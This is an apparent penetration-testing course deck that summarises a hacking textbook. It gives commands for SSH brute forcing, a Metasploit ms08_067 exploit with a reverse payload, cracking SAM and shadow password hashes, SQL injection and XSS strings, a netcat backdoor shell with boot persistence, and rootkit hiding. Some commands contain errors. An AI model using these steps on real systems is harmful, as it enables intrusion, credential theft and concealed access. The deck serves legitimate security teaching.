SlideShare una empresa de Scribd logo

The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon

Descargar como PPTX, PDF
K
Kenneth Kwon

About the book: the basics of hacking and pernetration testing 한국 책으로 '이제 시작이야 해킹과 침투테스트'를 요약 및 정리함. Backtrack .

Ingeniería
1 de 63
The basics of Hacking and Penetration Testing 이제 시작이야 해킹과 침투 테스트 Kenneth Kwon 철통보안 시리즈 005 Made in 20011 It’s based on “Backtrack 5“ Not Kali
CHAPTER 1. Introduction All exmaples is based on ‘Backtrack 5’ It’s original book.
White hat & Black hat • There are three big differences between them. 1. Authorization 2. Motivation 3. Intent Penetration testing & Vulnerability assessment • The difference between Penetration testing & Vulnerability assessment. - Vulnerability is to check and exam services and systems - Penetration testing has more steps than Vulnerability assessment need to show how it could be abused by attackers. Difference Difference
Kali linux : Penetration testing Tool • Kali was called by ‘Backtrack’. But, now the name has been changed. • Easily can download by FREE!! https://www.kali.org/downloads/ (You should download from official site for safety.) PS. You can use any linux. But, need to setup lots of testing tools PS. There are other linux ditributions. : Matlinux, Fedora Security Spin, KATANA, STD, Pentoo, Blackbuntu etc. You can search the internet using keyword ‘Linux Penetration Testing Distributions’
APT(Advanced Package Tool) • Easily, fast make us install a software by simple command prompt • Especially, with APT, can be free from “Dependency Hell problem!” • How to use? apt-get update apt-get install [Software name] ex) apt-get install Cheops • VMware Tools is very convenient. - Full Auto-fit screen, - Able to exchange files between real OS and VM OS.
Kali linux : Start • Logon : Default user account ID : root / PW : toor (reverse type) • X-windows launch • root@bt~# startx • Terminal launch • #console or click icon • Network activate • #ifconfig : show interface which you be able to use • #ifconfig eth0 up : eth0 activate(up), bacsically off state for hide of tester • Network ip allocate • #ifconfig eth0 up 192.168.1.23 // allocate ip manually • #ifconfig // check ip setup. It’s necessary work after changing settting • Or #dhclient eth0 //allocate ip atumatically using DHCP • Shutdown • #poweroff or #reboot // ketword is ‘reboot’. But, fuction is same with ‘poweroff’ If your NIC is off, you need to turn it on Careful, It’s ‘ifconfig’. ‘ipconfig’ is in case of windows.
Penetration test Methodology • ZEH (Zero Entry Hacking : Reverse triangle step table) Reconnaissance : 군사목적의 탐색 Scanning : Port, Vulnerability scannning Explitation Access Authority Holding : making ‘Backdoor’ 4 Step table Keep circulating 4 steps
CHAPTER 2. Reconnaissance
Reconnaissance • Active reconnaissance Gathering information using even directly scanning and approaching. It could remain your ip and activity logs. • Passive reconnaissance Gathering information using redirect ways ; internet, web searching, googling etc.
Reconnaissance • Active reconnaissance Gathering information using even directly scanning and approaching. It could remain your ip and activity logs. • Passive reconnaissance Gathering information using redirect ways ; internet, web searching, googling etc.
HTTrack : website copy tool • Entirely copy a target website using HTTrack • copied : all pages, link, picture, code etc. • gather information in offline circumstance for less traces. • Setup • Kali : # apt-get install webhttrack • Win : download ( http://www.httrack.com/ )
Google Search Tip • Search operator • “site: “ • site:dsu.edu pat engebretson : search ‘pat engebretson’ in website ‘dsu.edu’ • “intitle:”, “alltitle” • allintitle: index of : when webpage’s title has ‘index of’ (only all) • intitle: index of : when webpage’s title has ‘index’ or ‘of’ (or) • “inurrl:” • inurl:admin : find url which has ‘admin’ words. It’s useful to find admin page or settting page!
Google stored page • There is some stored pages. It’s collected by google’s web crawler. • These pages are based on text contents : web code, pdf, word, excel etc. • Even You deleted your data, it could be alive in google’s stored pages palce. If web crawler collected data before you erased it. • “cache:” • cache:syngress.com : search ‘syngress.com’ only in google’s stored pages place. • “filytype:” • site:dsu.edu filetype:ppt : find *.ppt in site ‘dsu.edu’ (ppt, xlsx,doc,txt etc) • % caution : when you clicked a url, it leave traces.
Harvester : tool • Python scripts • Categorize e-mail and subdomains related with target. • Harvester search data from google, bing, PGP, LinkedIn etc • If you are not Kali, download from http://www.edge-security.com • And, #tar xf theHarvest • Launch • find ‘TheHarvester’ • or # cd /pentest/enumeration/google/theharvester • # ./thHarvester.py –d syngress.com –l 10 –b google • : search email, subdomain, host in syngress.com. • : -l(result numbers), -b(choose search engine)
Whois : tool and site • Find information of ip, host name, company address, contact number from company DNS. • #whois syngress.com : whois [target_domain] • And go to http://www.whois.net and ‘WHOIS LOOKUP : syngress.com’ • Check ‘Referral URL: ‘
Netcraft : tool and site • http://news.netcraft.com • What’s that site running : syngress : find website which has ‘syngress’ in name • Can see ip, webserver’s OS, DNS server etc.
HOST : tool • Convert [hostname] and [IP address] • root@bt~@# host ns1.dreamhost.com : # host [target_hostname] • # host [IP address]
NS lookup • Useful tool to investigate DNS • query to DNS and get info which DNS knows • It can be activated on interactive mode. • # nslookup • > server 8.8.8.8
Dig • Tool for gathering information from DNS. • # dig @192.168.1.23 example.com –t AXFR • : try to DNS zone transfer(AXFR) from DNS server ‘192.168.1.23 example.com’ • AXFR works only when AXFR is available and not limited from DNS setting. • No matter is hard to success, Try it. That’s Reconnaissance process.
MetaGooFil • Same inventors who made Harvester made MetaGooFil • Find hidden data what document has automatically ; owner, writer account, stored file location etc. • Use • MetaGooFil Icon • or cd /pentest/enumeration/google/metagoofil • mkdir files • ./metagoofil.py –d syngress.com –f all –o results –t files • : -d (target domain), -f (file type), -o (setting name which would be made), -t (storing location)
Social Engineering Technique. • Contact sales department person using e-mail and check e-mail’s Header. • If he is on vacation, try to pretend him. • ex) “I lost my password, would you reset for me?” • Leave CD, USB near the company • Normally people are curious and tend to open them which could install backdoor.
Reconnaissance Tip • Website information : merge schedule(another attack route), recruit board(System hardware info) • Use the Google! Google is web crawler. • Watch the Jonny Long’s video which can find in DefCon reference library. • Be a SNS friend. Someday you can find gold from what they saying • “I can’t go home tonight, Server is down! OMG!” like this. Sincerely it’s real. • Mail server could be main point for attack. Because people always use e-mail for their business. • So, there are many information. • As the step of pushing, you can send ‘empty *.bat, calc.exe etc’. • Then, mail server would reject them and send back. • In that case, sometimes there are vaccine company’s name, version and etc. • Also, could check e-mail’s header(IP, specific SW version, mail server brand etc)
Extra recommend steps • SEAT(Search Engine Assessment Tool) • : use multi-serach engine at once. (www.midnightresearch.com) • GHDB(Good Hacking Database of Jonny Long) • : famous and effective website relate to hacking (www.hackersforcharity.org/dhdb) • Book : Google hacking for Penetration Testers of Jonny Long (Recommend) • Maltego CE : gather detail information from public/open based DB. This tool is easy and very useful (included in kali)
CHAPTER 3. Scanning Steps 1. Running check 2. Port scanning 3. Vulnerability scanning Port No. 20 FTP 21 FTP control 22 SSH 23 Telnet 25 SMTP(e-mail) 53 DNS 80 Http 443 Https
FPing : Ping Sweep tool • Ping is ICMP packet • is Echo Request packet • Ping Sweep is function which automatically sends ping to range of IP address. • # fping –a –g 192.16.45.1 192.16.45.254>hosts.txt : -a (save only result data) –g (sweep range)
Nmap : Port scanning tool • Download (http://www.insecure.org) • TCP Scanning - #nmap –sT –p- –PN 172.16.45.135 • : -sT (TCP scanning), -P (all port scan. Not only popular 1000), • : -PN(skip running check, just try to port scan in and out of running) • SYN Scanning is called by Stealth Scan(Not anymore. It’s old story). • It’s default setting of Nmap scanning and more fast than TCP Scanning. • #nmap –sS –p –PN 172.16.45.135 • UDP Scanning #nmap –sUV 172.16.45.129 • : -sUV(UDP Scanning+Version Scanning) • UDP scanning taks long time. So, don’t use ‘–p’ , ‘-PN’. Already alomost 20min. • Version Scanning : Even port is filtered, Sometimes Version scanning could open. That’s why we use -sUV TCP 3way hand-shaking 1. SYN C to S 2. SYN, ACK S to C 3. ACK C to S
Nmap : Port scanning tool • X-mas Tree Scanning #nmap –sX –p- –PN 172.16.45.129 • FIN, PSH, URG flags ‘ON’. If port is closed, target sends back ‘RST packet’ • If port is open, target doesn’t send anything. • Null Scanning #nmap –sN –p- -PN 172.16.45.129 • No flags. If closed, send back RST / if opened, send back nothing. • These two techniques are started from RFC documents. • Sometimes Algorithm has vulnerability in itself. • More options -T [0~5] : Scanning speed control for avoiding detection • -O : OS check
Nessus : Vulnerability scanning • There are others ; Core Impact, Saint / premium • Steps • Download (http://www.nessus.org) • Type e-main in nessus website and check e-mail for product register key. • Install • Create account and access Nessus server. • Plug-In update • In Broswer, https://127.0.0.1:8834 and access Nessus. • Configuration Policies • Now, Scan vulnerability.
CHAPTER 4. Exploitation
Medusa : brute force tool • Installation # apt-get update • # apt-get install medusa (if you don’t have or if you want to update) • Password dictionary /pentest/passwords/wordlist : bult-in word list of Kali. • /pentest/passworrds/jtr/password.lst : Jack the ripper’s word list. • Could exploit AFP, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PC Anywhere, POP3, REXEC, RLOGIN, SMTPAUTH, SNMP, SSHv2, Telnet, VNC, Web etc. • #medusa –h 172.16.45.129 –u ownedb –P /pentest/passwords/wordlists/drkc0de.lst –M ssh • : -h [target_IP] • : -u [user_ID] (If target account is 1), -U [account_list] (if target account are many) • : -p [single password try], -P [password list location] • : –M [Authorization service type to exploit]
Metasploit : essential tool (1/3) Introduction • Lots of people love it ! Thank you ‘HD Moore’ • It’s open source exploit ‘frameworks’ • Make you choose payloads you want. • Downloads (Http://www.metasploit.com) • Excute in Kali #/pentest/exploits/framwork3/msfconsole • or ‘K-start menu’ • Should see ‘msf> ‘ console screen • Update msf>msfupdate (do it everytime)
Metasploit : essential tool (2/3) Attack practice • Use Nessus for finding Vulnerability. • (Need to use all you have for exploitation.) • If your taget didn’t update MS 08-67 or MS 09-001 • msf> search ms08-67 : can get information for where is attack code and it’s rank. • Rank system : Manual – Low – Average – Normal – Good – Great – Excelent • Higher Rank is likely to be succeed • msf> use windows/smb/ms08_067_netapi : chose attack code which Nessus recommended • msf> show payloads : can see lists which is compatiable with used code(above). • msf> set payload windows/vncinject/reverse_tcp
Metasploit : essential tool (3/3) Attack practice • In this practice, we gonna install VNC(make them remote access to me) • msf> show options • msf> set RHOST 172.168.45.130 : target • msf> set LHOST 172.168.45.135 : attacker • msf> expoit : Now, it’s show time! Automatically it woks! • Summary 1. msf> msfupdate 2. “Nessus” 3. msf> search ms08_67 4. msf> use windows/smb/ms08_67 5. msf> show payloads 6. msf> set payload windows/vncinject/reverse_tcp 7. msf> show options 8. msf> set RHOST 172.168.45.130 9. msf> set LHOST 172.168.45.130 10. msf> exploit
Metasploit : essential tool (4/4) Sample payload list • windows/adduser • windows/exec • windows/shell_bind_tcp • windows/shell_reverse_tcp • windows/meterpreter/bind_tcp • windows/meterpreter/reverse_tcp • windows/vncinject/bind_tcp • windows/vncinject/reverse_tcp Bind and Reverse bind : Attacker send attack code to target. Attacker access to target Reverse : Attacker send attack code to target Tagert access to Attacker
Metasploit : essential tool (4/4) Metapreter • Excuted on shell, doesn’t use Hard disk drive. So, could make you conceal more. • Get authorization of a account which the metapreter was running at that time. • Designed as a Hacking tool from the beginning. • Command • migrate : move metapreter server to another process for avoiding power-off, service down etc • kill : process stop • download. upload, edit, excute • ls,ps,shutdown,mkdir,pwd,ifconfig etc (normally used in linux) • As advance function, get pwd hash using SAM juicer • Ruby shell, DLL load or excute, keyboard and mouse lock etc
John the Ripper : the lord of pwd cracking • Password is important to get more authorization. • Hash coding performance test • # cd /pentest/passwords/jtr • # ./john –test • How to get SAM(Security Account Mager; windows) • 1. Metapreter and SAM juicer in case of remote computer • 2. Dual booting as kali when you can approach physically. • # fdisk –l • # mkdir /mnt/sda1 • # mount /dev/sda1 /mnt/sda1 : mount [From A] [To B], making connection route. • # cd /mnt/sda1/Windows/system32/config • # samdump2 system SAM > /tmp/hashes.txt : Decrypt SAM using system(key) and samdump2 Tip. So many times, Local Admin account password is same with Network Admin password. It’s really vulnerable point. Don’t do this and attack this! Download (http://www.openwall.com/john)
John the Ripper : the lord of pwd cracking • Previous Microsoft encryption algorithm • LM (Lan Manager) • 1. make all alphabets capital letters • 2. length is 14, all the time • 3. saved 7 and 7. it’s easier than 14 length. • Recently use NTLM, but still some OS uses LM for compatibility with old computer. • # john : Automatically move john directory; /pentest/passwords/jtr • # ./john /tmp/hashes.txt : if target use LM • or # ./john /tmp/hases.txt -f:NT : if target use NTLM • In linux, password hash is at ‘/etc/shadow’ • # john or # cd /pentest/passwords/jtr • # ./unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes.txt : combined ‘passwd’ and ‘shadow’ like ‘system’ and ‘SAM’ in windows • # ./john /tmp/linux_hashes.txt : excute cracking • If there is any error massage like ‘No password hashes loaded’, it’s because of ‘John the ripper version’
Password Resetting • By force, reset password. • Reset SAM files. So, it surely remains logs. • Need to approach physically. • Boot as Kali • # fdisk –l and # mount /dev/sda1 /mnt/sda1 • # cd /pentest/passwords/chntpw • # ./chntpw hn : find all available switches • # ./chntpw hi /mnt/sda1/WINDOWS/system32/config/SAM : ‘-i’ interactively • # ./chntpw –i /mnt/sda1/WINDOWS/system32/config/SAM
Macof : Network Sniffing • Make it promicuous mode, not nonpromicuous mode. • Need to make a switch into a hub by ‘fail-open’ of switch. • : In case of ‘fail-closed’, it could be service down attack. • Macof imbue thousands of MAC address to switch. • repeat commands thousands times : #macof –i eth0 172.16.45.123 –d 172.16.45.2 • It’s easy to be detected. So, do this when you don’t need to care concealment.
Wireshark : Network Sniffing • Download (http://wireshark.org) : old name is ‘Ethereal’ • Try to monitor FTP packet, FTP uses uncoded packet
Fast Track Auto • Automate all exploitation steps. All you need to do is just to set target’s IP address. • It doesn’t care any concealment or caution. • How to use • ‘Penetration’ – ‘Fast Track’ - ‘Fast-Track WebGUI’ – ‘Autopwn Automation Link’ – type IP address • # sessions –l • # sessions –i [ID] • After commands, Now metapreter is excuting in target PC
PRACTICE • Recommend Practice target • Windows XP • Metasploit Unleashed project_ setting Ubuntu 7.04(has SAMBA) • Metasploitable : download using torrent from metasploit express cummunity site • De-ICE : penetration test live Linux CD series • download (http://heorot.net/livecds/) • It couldn’t attack using only Fast-Track. So, it’s good to practice
CHAPTER 5. Web based Exploitation Intetnet gonna be more execuatable. It means internet could be exposed to critical invasion.
NIKTO : webserver vulnerability scanner • After Port-scanning and Discovering about port 80(http) 443(https), • NIKTO would be used for evaluating the service. • # cd /pentest/scanners/nikto • # perl nikto.pl : see available options • # perl nikto.pl –h 172.16.45.129 –p 1-1000 –o /tmp/nikto_saves.txt • : ‘-h’ target IP, ‘-p’ port scanning, ‘-o’ save route and choose file name • Download (http://www.cirt.net/Nikto2)
Websecurity : Automated web vulnerability scanner • Good to figure out vulnerability point ; SQL injection, XSS, attached file etc. • ‘K-start’ – ‘Backtrack’ – ‘Web Application Analysis’ – Web(front end) - Websercurity
WebScrab : Spidering Website information collecter • Usually After Vulnerability Scanning(:Nikto and Websecurity), execute Spidering Program(:WebScrab) • WebScrab is capable through OWSP website. • How to use • Same route with ‘Websecurity’, just - ‘Web(front end)’ – WebScrab lite • Setup Manual proxy configuration : < IP : 127.0.0.1 (loopback), Port : 8008 > • : All web traffics gonna pass WebScrab cause of Proxy setting • : https is no more available cause of WebScrab • : Can control network traffic ; stop, monitor, manipulate • Inset URL and right-click, ‘Spider tree’ • : Spdering process is good to find unintended or exposed secret information.
WebScrab : Spidering (2/2) Website information collecter • You can do ‘Packet intercept’ • Execute ‘WebScrab lite’ and check box ‘Intercept requests’ and ‘Intercept responses’ in intercept tab. : in this process, Proxy setting is necessary. • Try to change ‘Value field’. • HTTP requests and responses are normally encoded by ‘Base64’. • : It’s not encryption. So, easy to decode using program or online-tools
SQL Injection : Injection exploitation • Modern web application uses Interpreted programming language and Back-End database, dynamic contents interacting with Users. • Should understand lost of SQL grammar and Vendors(makers). • when you search “laptop” in shopping mall site, it works like below. • Normal : SELECT * FROM product WHERE category=‘laptop’; • If you want to do SQL Injection, type “laptop’ or 1=1--” instead of “laptop” • SELECT * FROM product WHERE category=‘laptop’ or ‘1=1-- : the rear -- is comment • If Account is uncertain, usually return FIRST user account and It’s DB administrator with high probability. • SELECT * FROM users WHERE uname=‘ ‘or 1=1–- and pwd=‘syngress’ : the rear -- is comment • If you knows Account name, can apply belew setence. • SELECT * FROM users WHERE uname=‘admin’ and pwd=‘ ‘ or 1=1--
XSS (Cross Site Scripting) • Inserting scripts into Web application. Those scripts works like truth-worthy website parts. • XSS focuses on Client exploitation instead of Sever (server is usual target) • After inserting scripts, User PC consider all contents are reliable. It’s really powerful exploitation. • XSS could be applicatable in website, e-mail, messenger etc. • Usual Test way • Type <scripts>alert(“XSS Test”)</scripts> • : If website popup message ‘XSS Test’, that website is vulnerable. • There are two major XSS exploitation. (Study by youself) • 1. Reflected cross-site scripting : Attacker sends scripts to server. • Server sends back scripts to Users. • In this case, Payload would be excuted immediately. • 2. Stored cross-site scripting : Attacker sends scripts to server. • vulnerable Server saves scripts. • It could effect all users who try to access this server.
PRACTICE • OWASP developed vulnerable platform to learn and practice web based exploitation. • “The WebGoat” project. • It’s practical and scenario based study environment. Consists of more 30 lessons. • JRE is necessary and it could be downloaded (http://owasp.org) • Setup in Virtual system. Default ID/PW is guest/guest. • Recommend that you read “readme”. • You could know web exploitation trends on OWASP “Top Ten” • Recommend that you sign in OWASP. You can join projects and study together. Tip. ‘Burps Suit’ , Best application testing tool which is recommended by exper hackers.
CHAPTER 6. Backdoor and Rootkit Attackers remain Backdoor and Rootkit for holding authorization. It make them in anytime again and again.
Netcat • It can be used for file transfer, port scan, messenger. • There are two modes : Client mode and Server mode • 1. Client mode can make network connection and service with other PCs. • # nc –l –p 2323 : ‘-l’ listener mode, ‘-p’ port to wait access. ‘-L’ keep port open after disconnection. • # nc 172.16.45.132 2323 : It’s other PC. With this command, you can chat • If you add Netcat to ‘HKEY_LOCAL_MACHINEsoftwaremicrosoftwindowscurrentversionrun’ in Windows system, Netcat program would be executed every-windows boot. • In case of Linux, it’s more difficult. You need to make Bash scripts. Find it on internet, if you want to study more.
Netcat (2/3) • When Netcat is still running • # nc –l –p 7777 > calc.exe : Receiving input would save in calc.exe • # nc 172.16.45.129 777 < calc.exe : Sending file • Netcat doesn’t let you know it’s done or not. So, disconnect ‘CTRL+C’ after a few seconds. • After seding, type ‘ls’ to check it’s done clearly. • Sometimes it can be used for figure out which service is working (even Nmap and Nessus doesn’t do) • # nc 172.16.45.129 50001 : See the responses, ‘-u’ UDP packet transfer. • # nc –l –p 12345 –e /bin/sh • : ‘-e [program]’ execute program, It’s powerful to setting backdoor shell. • : If anyone access using port 12345, could get shell. • In windows : # nc –l –p 12345 c:WindowsSystem32cmd.exe
Netcat (3/3) • Summary • 1. Get metapreter shell • 2. metapreter > upload nc.exe c:windowssystem32 ( In case of windows ) • 3. metapreter > nc –L –p 5777 –e cmd.exe
CryptCAT : Netcat’s encrytion version • All Netcat’s traffics are plain texts. So, make that better. That’s CryptCat. • CryptCat uses ‘twofish encryption’ • First of all, you need to change basic key ‘metallica’ using ‘-k’ option. • If you don’t do this, anybody can decrypt. So, It’s necessary. • Server • # cryptcat –l –p 5757 • Client • # cryptcat 172.16.45.129 5757 : Same grammar with Netcat.
NetBus • It’s really classic SW for backdoor and remote-control ; It was made in 1998. • Install Server part on Target and Install Client part on Attacker. • Server (target) • execute ‘patch.exe’. Then, ‘patch.exe’ process is on your CPU • and every-time when you boot windows, it would execute automatically. • But, it’s classic. It’s good to practice But, not good to use in real exploitation..
RootKit • It’s really powerful. You can hide your file, process and program. Sometimes even anti-SW can’t find it. • Even rootkit can hook system call. When you press Ctrl+Alt+Del, rootkit would hide its process.
Hacker Defender • Don’t make it trick you. It’s rootkit! • Remember : hxdef100.exe : execute Hacker Defender on target PC. • hxdef100.ini : make a list what you want to hide (programs, files, services) • bdcli100.exe : Client SW for accessing Hacker defender’s backdoor. • How to use • 1. upload hsdef100.zip and unzip. • 2. modify hxdef100.ini to hide where it is or what you do. • [Hidden Table] : file names which you want to hide. ‘hxdef*’ : hide all files, directories which start ‘hxdef’ from file manager and windows explorer. • [Hidden Processes] : block interaction. If you add ‘calc.exe’, users couldn’t find or use calc.exe anymore. • [Root processes] : allow full-interaction even hidden files or system files. • [Hidden services] : hide services • [Hidden RegKeys] : In almost every-case, when you install programs, Registry would be added. • So, you need to hide you Registry Keys • [Hidden RegValues] : seperately hide RegKeys. • [Startup Run] : when Hacker Defender starts, this list also would execute. • [Free Space] : add fake space volume from real rest space volume of Hard disk. Unit is ‘byte’. • [Hidden Ports] : TCPI, TCPO, UDP. I is in-port, O is out-port. You can use ‘,’ to arrange ports. Tip. 1. You can install Netcat and hide it using Hacker Defender. Try it 2. If you want to master Rootkit, study OS kernel more and more.
How to Defend Rootkit • 1. Use Kernel-level(low level) Anti-Virus Software. • 2. Always update your Anti-Virus Software. • 3. Monitoring IN&OUT traffics and ports. • 4. Sometimes use Anti-Rootkit Software ex. Rootkit Revealer, Vice, Blacklight of F-Secure • 5. Check infected OS using Normal OS.
PRACTICE • You must use Netcat once in practice! • Windows’s Netcat and Linux’s Netcat communication is available. • Try to use advanced functions of Netcat • : Proxy, Reverse shell, Port scan, Disk partition image making and copy. • Read ‘man’ page. • When you practice Rootkit, use Virtual Machine for your safety. You should be stand-alone. • Ncat : Current version of Netcat. It’s a part of Nmap. Added SSL&IPv6 function. • Socat : similar to Ncat. Good to read and write network-traffics. • If you want to study more about backdoor, Back-orifice(classic backdoor) and Sub 7 are nice references. • If you want to study more about Rootkit, study OS kernel. • Before Rootkit or Backdoor, You need to get high-authorization.
CHAPTER 7. Penetration Test Report
Report of Penetration Test • At lease, These three are necessary. • 1. Test result summary • : Write down easily as possible as you can. Even history scholar could understand. • 2. Detailed result report • : Write down detailedly. This report is for similar engineers. • : Explain which critical problem could happen. Don’t focus on your achievement. • : Even you couldn’t penetrate, should write this report. Attach the result of attempts. • 3. Evidence • : attach screenshots or anything you could make them caution. • : If you don’t want to expose your special skills, you don’t need to do that. • But, at lease you should let them know which is vulnerable. • : The most important thing is to keep the secret information. It’s basic and essential. • It’s not enough to emphasize again and again.
Lastly, Before end. • Join IT security Conference once at any cost! • Join Communities : InfraGard, OWASP, Backtrack-Linux Forums etc • More study, Here books. I just writ it down shortly. • Aggressive Network Self-Defense. By Neil R. • A Guide to kernel Exploitation. By Enrico Perla. • Managed Code Rootkits. By Erez Metula. • Nessus Network Auditing. By Russ Rogers. • Ninja hacking. By Thomas Wilhelm and Jason Andress. • PenTester’s Open Source Tookit. By Jeremy Faircloth. • Professional Penetration Testing. By Thomas Wilhelm. • Seven Deadliest Attack Series. • Stealing the Network : The complete Series. By Johnny Long

Recomendados

Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
Revoke-Obfuscation
Revoke-ObfuscationRevoke-Obfuscation
Revoke-ObfuscationDaniel Bohannon
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014grecsl
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...grecsl
 
DevSec Defense
DevSec DefenseDevSec Defense
DevSec DefenseDaniel Bohannon
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Malicious Payloads vs Deep Visibility: A PowerShell Story
Malicious Payloads vs Deep Visibility: A PowerShell StoryMalicious Payloads vs Deep Visibility: A PowerShell Story
Malicious Payloads vs Deep Visibility: A PowerShell StoryDaniel Bohannon
 

Recomendados

Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
Revoke-Obfuscation
Revoke-ObfuscationRevoke-Obfuscation
Revoke-ObfuscationDaniel Bohannon
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014grecsl
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...grecsl
 
DevSec Defense
DevSec DefenseDevSec Defense
DevSec DefenseDaniel Bohannon
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Malicious Payloads vs Deep Visibility: A PowerShell Story
Malicious Payloads vs Deep Visibility: A PowerShell StoryMalicious Payloads vs Deep Visibility: A PowerShell Story
Malicious Payloads vs Deep Visibility: A PowerShell StoryDaniel Bohannon
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
Introduction to Penetration Testing
Introduction to Penetration TestingIntroduction to Penetration Testing
Introduction to Penetration TestingAndrew McNicol
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestSecuRing
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunterAndrew McNicol
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP SinghBipin Upadhyay
 
Flaying the Blockchain Ledger for Fun, Profit, and Hip Hop
Flaying the Blockchain Ledger for Fun, Profit, and Hip HopFlaying the Blockchain Ledger for Fun, Profit, and Hip Hop
Flaying the Blockchain Ledger for Fun, Profit, and Hip HopAndrew Morris
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware AnalysisAndrew McNicol
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersAndrew McNicol
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestSecuRing
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellPesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellDaniel Bohannon
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementAndrew McNicol
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion TechniquesJason Lang
 
The Background Noise of the Internet
The Background Noise of the InternetThe Background Noise of the Internet
The Background Noise of the InternetAndrew Morris
 
Snake bites : Python for Pentesters
Snake bites : Python for PentestersSnake bites : Python for Pentesters
Snake bites : Python for PentestersAnant Shrivastava
 
Advanced Weapons Training for the Empire
Advanced Weapons Training for the EmpireAdvanced Weapons Training for the Empire
Advanced Weapons Training for the EmpireJeremy Johnson
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesDaniel Bohannon
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Codemotion
 
2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CDSimon Bennetts
 

